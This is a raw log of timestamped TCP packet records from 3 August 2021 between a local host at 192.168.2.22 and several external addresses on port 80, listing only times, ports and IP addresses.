Aug 3, 2021 16:50:38.146711111 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146713972 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146716118 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146718979 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146722078 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146724939 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146728992 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146729946 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146730900 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146734953 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146738052 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146740913 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146744013 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146747112 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146749973 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146752119 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146753073 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146755934 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146758080 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146760941 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146764040 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146766901 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146770000 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146773100 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146775007 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146778107 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146780968 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146784067 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146786928 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146797895 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.147624969 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.148842096 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.148868084 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.148886919 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.148890018 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.148910999 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.148924112 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.148931980 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.148943901 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.148955107 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.148958921 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.148969889 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.148978949 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.148979902 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149000883 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149008989 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149020910 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149040937 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149061918 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149081945 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149101973 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149203062 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149209023 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149210930 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149215937 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149219036 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149219990 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149221897 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149245024 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149246931 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149266005 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149275064 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149286032 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149306059 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149313927 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149326086 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149339914 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149344921 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149346113 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149360895 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149365902 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149379015 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149386883 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149398088 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149410009 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149415016 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149431944 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149435043 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149452925 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149461031 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149472952 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149485111 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149493933 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149507999 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149514914 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149528980 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149538994 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149550915 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149563074 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149571896 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149586916 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149596930 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149610043 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149612904 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149632931 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149637938 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149653912 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149658918 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149674892 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149679899 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149696112 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149708033 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149715900 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149725914 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149738073 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149745941 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149755001 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149770021 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149784088 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149794102 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149806976 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149811029 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149815083 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149817944 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149837017 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149852991 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149857998 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149871111 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149878979 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149888992 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149899006 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149908066 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149919987 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149923086 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149940014 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149943113 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149962902 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.149962902 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149983883 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.149985075 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.150006056 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.150015116 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.150028944 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.150048971 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.150057077 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.150060892 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.150070906 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.150091887 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.150093079 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.150101900 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.150110006 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.150115013 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.150135040 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.150135040 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.150161028 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.150197029 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.163084030 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.163139105 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.163161993 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.163172960 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.163177967 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.163196087 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.163206100 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.163229942 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.315596104 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.315627098 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.315649033 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.315669060 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.315737009 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.315769911 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.315773964 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.315778017 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.315995932 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316016912 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316037893 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316059113 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316062927 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316082954 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316103935 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316123009 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316127062 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316129923 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316139936 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316162109 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316170931 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316181898 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316190004 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316241026 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316247940 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316298962 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316319942 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316333055 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316335917 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316349030 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316356897 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316359043 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316376925 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316394091 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316417933 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316464901 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316473007 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316519022 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316520929 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316540956 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316557884 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316577911 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316590071 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316613913 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316653013 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316673994 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316694021 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316715002 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316741943 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316764116 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316778898 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316848993 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316859961 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316862106 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316865921 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316896915 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316920042 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316941977 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316956997 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316962004 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.316982031 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.316993952 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317028046 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317049980 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317075014 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317094088 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317097902 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317138910 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317177057 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317219019 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317224026 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317240953 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317261934 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317261934 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317277908 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317296982 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317310095 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317332983 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317352057 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317358017 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317368984 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317406893 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317646980 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317676067 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317698956 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317702055 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317722082 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317723036 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317740917 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317745924 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317760944 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317770958 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317775011 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317795038 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317801952 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317816973 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317833900 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317837000 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317851067 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317859888 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317867041 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317883968 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317898989 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317909002 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317915916 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317934036 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317956924 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.317960024 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317975044 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.317981958 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.318001986 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.318017006 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.318030119 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.318031073 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.318039894 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.318053961 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.318067074 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.318078041 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.318088055 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.318104029 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.318114996 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.318131924 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.318146944 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.318156004 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.318170071 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.318181992 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.318191051 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.318447113 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:39.187416077 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:51:50.373336077 CEST	49168	80	192.168.2.22	78.31.67.91
Aug 3, 2021 16:51:50.434190035 CEST	80	49168	78.31.67.91	192.168.2.22
Aug 3, 2021 16:51:50.440187931 CEST	49168	80	192.168.2.22	78.31.67.91
Aug 3, 2021 16:51:50.440246105 CEST	49168	80	192.168.2.22	78.31.67.91
Aug 3, 2021 16:51:50.469314098 CEST	80	49168	78.31.67.91	192.168.2.22
Aug 3, 2021 16:51:50.469618082 CEST	80	49168	78.31.67.91	192.168.2.22
Aug 3, 2021 16:51:50.471082926 CEST	80	49168	78.31.67.91	192.168.2.22
Aug 3, 2021 16:51:50.471204042 CEST	49168	80	192.168.2.22	78.31.67.91
Aug 3, 2021 16:51:50.471777916 CEST	49168	80	192.168.2.22	78.31.67.91
Aug 3, 2021 16:51:50.501209974 CEST	80	49168	78.31.67.91	192.168.2.22
Aug 3, 2021 16:51:55.521222115 CEST	49169	80	192.168.2.22	34.102.136.180
Aug 3, 2021 16:51:55.538758993 CEST	80	49169	34.102.136.180	192.168.2.22
Aug 3, 2021 16:51:55.538938046 CEST	49169	80	192.168.2.22	34.102.136.180
Aug 3, 2021 16:51:55.539252996 CEST	49169	80	192.168.2.22	34.102.136.180
Aug 3, 2021 16:51:55.556705952 CEST	80	49169	34.102.136.180	192.168.2.22
Aug 3, 2021 16:51:55.653333902 CEST	80	49169	34.102.136.180	192.168.2.22
Aug 3, 2021 16:51:55.653367043 CEST	80	49169	34.102.136.180	192.168.2.22
Aug 3, 2021 16:51:55.653628111 CEST	49169	80	192.168.2.22	34.102.136.180
Aug 3, 2021 16:51:55.653733015 CEST	49169	80	192.168.2.22	34.102.136.180
Aug 3, 2021 16:51:55.960484982 CEST	49169	80	192.168.2.22	34.102.136.180
Aug 3, 2021 16:51:55.980778933 CEST	80	49169	34.102.136.180	192.168.2.22
Aug 3, 2021 16:52:00.709106922 CEST	49170	80	192.168.2.22	192.0.78.25
Aug 3, 2021 16:52:00.727026939 CEST	80	49170	192.0.78.25	192.168.2.22
Aug 3, 2021 16:52:00.727201939 CEST	49170	80	192.168.2.22	192.0.78.25
Aug 3, 2021 16:52:00.727487087 CEST	49170	80	192.168.2.22	192.0.78.25
Aug 3, 2021 16:52:00.747554064 CEST	80	49170	192.0.78.25	192.168.2.22
Aug 3, 2021 16:52:00.747591019 CEST	80	49170	192.0.78.25	192.168.2.22
Aug 3, 2021 16:52:00.747610092 CEST	80	49170	192.0.78.25	192.168.2.22
Aug 3, 2021 16:52:00.747796059 CEST	49170	80	192.168.2.22	192.0.78.25
Aug 3, 2021 16:52:00.747884035 CEST	49170	80	192.168.2.22	192.0.78.25
Aug 3, 2021 16:52:00.772372961 CEST	80	49170	192.0.78.25	192.168.2.22
Aug 3, 2021 16:52:05.995975018 CEST	49171	80	192.168.2.22	23.82.57.32
Aug 3, 2021 16:52:06.172300100 CEST	80	49171	23.82.57.32	192.168.2.22
Aug 3, 2021 16:52:06.175973892 CEST	49171	80	192.168.2.22	23.82.57.32
Aug 3, 2021 16:52:06.176023960 CEST	49171	80	192.168.2.22	23.82.57.32
Aug 3, 2021 16:52:06.352343082 CEST	80	49171	23.82.57.32	192.168.2.22
Aug 3, 2021 16:52:06.352396011 CEST	80	49171	23.82.57.32	192.168.2.22
Aug 3, 2021 16:52:06.352407932 CEST	80	49171	23.82.57.32	192.168.2.22
Aug 3, 2021 16:52:06.353168011 CEST	49171	80	192.168.2.22	23.82.57.32
Aug 3, 2021 16:52:06.353276014 CEST	49171	80	192.168.2.22	23.82.57.32
Aug 3, 2021 16:52:06.524899960 CEST	80	49171	23.82.57.32	192.168.2.22
Aug 3, 2021 16:52:11.687258005 CEST	49172	80	192.168.2.22	163.44.239.73
Aug 3, 2021 16:52:11.973789930 CEST	80	49172	163.44.239.73	192.168.2.22
Aug 3, 2021 16:52:11.978562117 CEST	49172	80	192.168.2.22	163.44.239.73
Aug 3, 2021 16:52:11.978595972 CEST	49172	80	192.168.2.22	163.44.239.73
Aug 3, 2021 16:52:12.266417027 CEST	80	49172	163.44.239.73	192.168.2.22
Aug 3, 2021 16:52:12.266453981 CEST	80	49172	163.44.239.73	192.168.2.22
Aug 3, 2021 16:52:12.266470909 CEST	80	49172	163.44.239.73	192.168.2.22
Aug 3, 2021 16:52:12.266788006 CEST	49172	80	192.168.2.22	163.44.239.73
Aug 3, 2021 16:52:12.266819954 CEST	49172	80	192.168.2.22	163.44.239.73
